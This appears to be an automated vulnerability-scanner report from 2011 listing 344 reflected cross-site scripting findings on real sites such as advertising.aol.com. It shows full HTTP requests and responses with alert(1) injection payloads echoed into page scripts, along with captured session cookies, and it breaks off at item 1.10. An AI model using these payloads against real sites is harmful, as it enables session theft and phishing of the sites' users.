1.326. http://www.lavasoft.com/mylavasoft/sites/default/files/fivestar/basic/basic.css [REST URL parameter 7]

1.327. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]

1.328. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.329. http://www.lavasoft.com/mylavasoft/login [Referer HTTP header]

1.330. http://www.lavasoft.com/mylavasoft/login [Referer HTTP header]

1.331. http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]

1.332. http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]

1.333. http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]

1.334. http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]

1.335. http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]

1.336. http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]

1.337. http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]

1.338. http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]

1.339. http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]

1.340. http://open.ad.yieldmanager.net/V1/NWSetter [url parameter]

1.341. http://www.marketwatch.com/subjects/oil [BIZO cookie]

1.342. http://www.marketwatch.com/subjects/oil [BIZO cookie]

1.343. http://www.marketwatch.com/subjects/oil [rsi_csl cookie]

1.344. http://www.marketwatch.com/subjects/oil [rsi_csl cookie]



1. Cross-site scripting (reflected)
There are 344 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://advertising.aol.com/finish/0/4/1/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/0/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985d"-alert(1)-"bb754d1e1d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c985d"-alert(1)-"bb754d1e1d4/0/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:49:24 GMT
ETag: "e8afd304ce25a4fe58344b5aca47c267"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c985d"-alert(1)-"bb754d1e1d4/0/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.2. http://advertising.aol.com/finish/1/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/1/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cafc2"-alert(1)-"32fb95a1715 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cafc2"-alert(1)-"32fb95a1715/1/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:50:01 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:50:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/cafc2"-alert(1)-"32fb95a1715/1/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.3. http://advertising.aol.com/finish/2/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/2/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c50"-alert(1)-"5b17dd630f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /51c50"-alert(1)-"5b17dd630f5/2/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:47:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:47:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/51c50"-alert(1)-"5b17dd630f5/2/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.4. http://advertising.aol.com/finish/4/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/4/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 62241"-alert(1)-"41856d58a51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /62241"-alert(1)-"41856d58a51/4/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Last-Modified: Wed, 07 Sep 2011 12:48:42 GMT
ETag: "3538488a391f1768268f673617ef149a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/62241"-alert(1)-"41856d58a51/4/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.5. http://advertising.aol.com/finish/5/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/5/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4aa89"-alert(1)-"2c267392a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4aa89"-alert(1)-"2c267392a85/5/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:47:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:47:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4aa89"-alert(1)-"2c267392a85/5/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.6. http://advertising.aol.com/finish/6/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/6/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8be0e"-alert(1)-"eeace66c30c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8be0e"-alert(1)-"eeace66c30c/6/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:49:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/8be0e"-alert(1)-"eeace66c30c/6/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.7. http://advertising.aol.com/finish/7/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/7/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c701"-alert(1)-"60f51ac54d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4c701"-alert(1)-"60f51ac54d2/7/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:49:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:49:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4c701"-alert(1)-"60f51ac54d2/7/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.8. http://advertising.aol.com/finish/8/4/1/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /finish/8/4/1/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7ad6"-alert(1)-"ce67ab6b923 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c7ad6"-alert(1)-"ce67ab6b923/8/4/1/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:48:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:48:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/c7ad6"-alert(1)-"ce67ab6b923/8/4/1/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

1.9. http://advertising.aol.com/nai/nai.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5431"-alert(1)-"ecc4042015f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /naib5431"-alert(1)-"ecc4042015f/nai.php?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/naib5431"-alert(1)-"ecc4042015f/nai.php?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javas
...[SNIP]...

1.10. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99290"-alert(1)-"21295270dc0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/nai.php99290"-alert(1)-"21295270dc0?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:24 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28127

